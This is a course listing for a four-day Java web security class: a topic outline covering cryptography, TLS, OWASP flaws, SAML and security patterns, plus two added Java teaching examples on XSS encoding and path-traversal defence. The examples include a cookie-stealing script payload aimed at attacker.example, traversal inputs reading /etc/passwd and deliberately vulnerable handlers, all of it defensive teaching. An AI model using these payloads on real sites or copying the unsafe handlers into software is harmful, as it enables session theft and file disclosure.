Java Web Security

Course:   JWSEC
Duration:   4 Days
Level:   II
On our website at:   http://www.verhoef-training.com/courses/JWSEC.html
 
Course Summary

This course shows how to deploy Java web applications with strong security measures for coding, communication and configuration. It begins with threats and mitigation techniques and the application of security design principles, then covers symmetric and public-key cryptography, encryption and hashing, transport security with SSL/TLS, the most common authentication protocols, use of the OWASP resources, SQL injection, cross-site scripting, web service security vulnerabilities, session hijacking, AJAX issues, SOAP message protection, detection of security flaws, and a review of security design patterns.

Topics Covered In This Course

IT Security Status

  • Security basics
    • Confidentiality
    • Integrity
    • Authentication/Authorization
    • Non-repudiation
  • Cryptographic roles
    • Key management
    • Trust models
    • Revocation
    • Random generation
  • Application flaws and threat modeling
  • Security realities
  • Security threat layers
    • Hub and Spoke
    • Perimeter
    • Identity
    • Hardware
    • OS
  • Security patterns
  • Services security

Security Patterns

  • Best practices
  • Review patterns catalog
  • Pattern design methodology
  • Tier patterns
    • Services
    • Identity
    • Provisioning
    • Personal

Communication Security

  • SSL architecture
  • SSL/TLS alert protocol
  • SSL threats
  • Use of TLS
  • Security certificates
    • Digital certificates
    • CA utilization
    • Distribution
    • Revocation

Application Server Security

  • HTTP restrictions
  • HTTPS utilization
  • Security API
    • Hashing algorithms
    • Cryptographic API
    • JCE API
    • JSSE
    • JAAS
  • Certificate management
  • Encryption techniques
    • Symmetric vs Asymmetric
    • Block ciphers
    • Block cipher modes of operation (e.g. CBC)
  • Session authentication
    • Hijacking prevention
    • Cross-site request forgery (CSRF)
    • Vulnerabilities
    • Session fixation
    • Timeout issues
    • Encryption threat mitigation

Web Application Security

  • Role-based granularity
  • Use of OWASP
  • OWASP vulnerabilities
    • Injection flaws
    • Authentication and Sessions
    • Cross-site scripting
    • Insecure direct object references
    • Sensitive data exposure
    • Access granularity
    • Unvalidated redirects and forwards
  • Application role security
    • Client tier
    • EJB tier
    • Component tier
  • Error handling
    • Standardized error management
    • Request faults
    • Page faults
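
An added example, not from the course page, of the cross-site scripting defence the list above refers to, in the same two forms the design-pattern section later calls Validators and Enforcers: an allow-list validator for a structured field, and context-specific output encoding for free-form text that cannot be allow-listed. The username policy, the HTML fragments and the attacker inputs are constructed for the example; the encoder covers the HTML element-body context only.

```java
import java.util.regex.Pattern;

public class XssDemo {
    // Allow-list for a structured field (assumed policy for this example): 3-32 chars of [A-Za-z0-9_-]
    private static final Pattern USERNAME = Pattern.compile("[A-Za-z0-9_-]{3,32}");

    static boolean isValidUsername(String s) {
        return s != null && USERNAME.matcher(s).matches();   // matches() anchors the whole string
    }

    // Output encoding for the HTML element-body context. Every character that can change
    // HTML structure is replaced by an entity, so the browser renders it as text.
    static String encodeForHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char ch = s.charAt(i);
            switch (ch) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                case '/':  sb.append("&#x2F;"); break;
                default:   sb.append(ch);
            }
        }
        return sb.toString();
    }

    // VULNERABLE: untrusted data concatenated straight into the response (reflected/stored XSS)
    static String renderCommentUnsafe(String comment) {
        return "<div class=\"comment\">" + comment + "</div>";
    }

    // FIXED: free-form text cannot be allow-listed, so it is encoded for the context it lands in
    static String renderCommentSafe(String comment) {
        return "<div class=\"comment\">" + encodeForHtml(comment) + "</div>";
    }

    // FIXED: a structured field is rejected by the validator first, and still encoded on output
    static String renderGreeting(String username) {
        if (!isValidUsername(username)) {
            throw new IllegalArgumentException("username rejected by validator");
        }
        return "<p>Welcome, " + encodeForHtml(username) + "</p>";
    }

    public static void main(String[] args) {
        // Constructed attacker inputs
        String scriptPayload = "<script>document.location='http://attacker.example/?c='+document.cookie</script>";
        String attrPayload = "\" onmouseover=\"alert(1)";

        System.out.println("unsafe: " + renderCommentUnsafe(scriptPayload));
        System.out.println("safe:   " + renderCommentSafe(scriptPayload));
        System.out.println("safe:   " + renderCommentSafe(attrPayload));

        System.out.println(renderGreeting("alice_01"));
        try {
            renderGreeting("bob<img src=x onerror=alert(1)>");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Encoding is context-dependent: the table above is correct for text between tags, but data placed inside an unquoted attribute, a JavaScript string, a URL parameter or a CSS value needs the encoder for that context, and a templating engine that escapes by default is preferable to hand-written concatenation.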

AJAX Management

  • AJAX components
  • Asynchronous issues
  • Vulnerabilities
    • JavaScript
    • SQL injection
    • Bridging
    • XSS
  • Vulnerability testing

Web Services Security

  • Architecture
  • Core issues
    • Threats
    • Vulnerabilities
    • Risks
  • Security requirements
    • Authentication
    • Integrity
    • Traceability
    • Confidentiality
    • Non-repudiation
    • Interoperability
  • XML encryption
  • XML Key management
  • WS-Security

Identity Management

  • Core issues
  • SAML overview
  • SAML Architecture
    • Assertions
    • Domain model
    • Policy enforcement
    • Request-Reply model
    • Attribute assertion
    • XML signatures

Application Scanning

  • Application threat analysis
    • SQL injection
    • XSS
    • Command execution
    • Server configuration
    • Directory traversal
  • Use of tools
    • Commercial
    • Software-as-a-Service
    • Open Source
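
The directory traversal item above is the one of these findings that scanners report most reliably, and the fix is small enough to show. This is an added example, not code from the course: a resolver that confines a user-supplied file name to a base directory, checking the lexically normalized path and then the real path so that a symlink inside the directory cannot point outside it. The temp directory, file and inputs are constructed fixtures; it needs a JDK 11 or later.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class PathTraversalDemo {
    // Resolves a user-supplied file name under base and refuses anything that would escape it.
    static Path resolveUnder(Path base, String userPath) throws IOException {
        Path root = base.toAbsolutePath().normalize();
        // resolve() returns userPath itself when it is absolute, so "/etc/passwd" fails the check below;
        // normalize() collapses "." and ".." lexically before the comparison
        Path candidate = root.resolve(userPath).normalize();
        if (!candidate.startsWith(root)) {          // element-wise prefix, not a string prefix
            throw new SecurityException("path escapes base directory: " + userPath);
        }
        // A symlink inside base can still point outside it; toRealPath() follows links, so re-check
        if (Files.exists(candidate)) {
            Path real = candidate.toRealPath();
            if (!real.startsWith(root.toRealPath())) {
                throw new SecurityException("symlink escapes base directory: " + userPath);
            }
            return real;
        }
        return candidate;
    }

    // VULNERABLE: the classic download handler that trusts the name it was given
    static String readUnsafe(Path base, String userPath) throws IOException {
        return Files.readString(base.resolve(userPath));
    }

    // FIXED: same handler, name confined to the base directory first
    static String readSafe(Path base, String userPath) throws IOException {
        return Files.readString(resolveUnder(base, userPath));
    }

    public static void main(String[] args) throws IOException {
        // Constructed fixture: a temp directory standing in for the web root
        Path base = Files.createTempDirectory("webroot");
        Files.writeString(base.resolve("public.txt"), "hello");

        String[] inputs = {
            "public.txt",
            "sub/../public.txt",
            "../../etc/passwd",
            "/etc/passwd"
        };
        for (String in : inputs) {
            try {
                System.out.println("OK   " + in + " -> " + resolveUnder(base, in));
            } catch (SecurityException e) {
                System.out.println("DENY " + in + " : " + e.getMessage());
            }
        }
        System.out.println("content: " + readSafe(base, "public.txt"));
    }
}
```

Two caveats a scanner will also probe: on Windows a backslash is a separator and `normalize()` handles it, while on Unix it is an ordinary file-name character; and a NUL byte in the name makes `Path` throw an unchecked `InvalidPathException`, which the caller should turn into a 400 rather than let propagate as a 500.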

Security Design Patterns

  • Web-tier
    • Authentication
    • Enforcers
    • Validators
    • Proxy
    • Interceptors
  • Business-tier
    • Container managed
    • Obfuscation
    • Delegator
    • Facade
    • Service management
  • Web Service tier
    • Network layer stack
      • Perimeter defense
      • XML firewall
    • Transport layer stack
      • Infrastructure
      • Identity provider
      • Directory services
    • Message layer stack
      • Interceptor
      • Secure router
      • Gateway

What You Can Expect

Upon conclusion, each participant will have acquired these skills:

Who Should Take This Course

This course is designed for Java developers, system designers and project managers who seek to design, create and implement secure applications.

Recommended Prerequisites

You should be familiar with the basics of web system architecture, including processes, class loading and threads. Some programming experience on the Java platform is preferable.

Training Style

Lecture/Lab

Related Courses
Code     Course Title                                    Duration   Level
WSST     Web Software and Security Testing               3 Days     I
WSSEC    Web Services Security Considerations in Java    1 Day      II
NETSEC   Planning and Managing Network Security          5 Days     II

Every student attending a Verhoef Training class will receive a certificate good for $100 toward their next public class taken within a year.

You can also buy "Verhoef Vouchers" to get a discounted rate for a single student in any of our public or web-based classes. Contact your account manager or our sales office for details.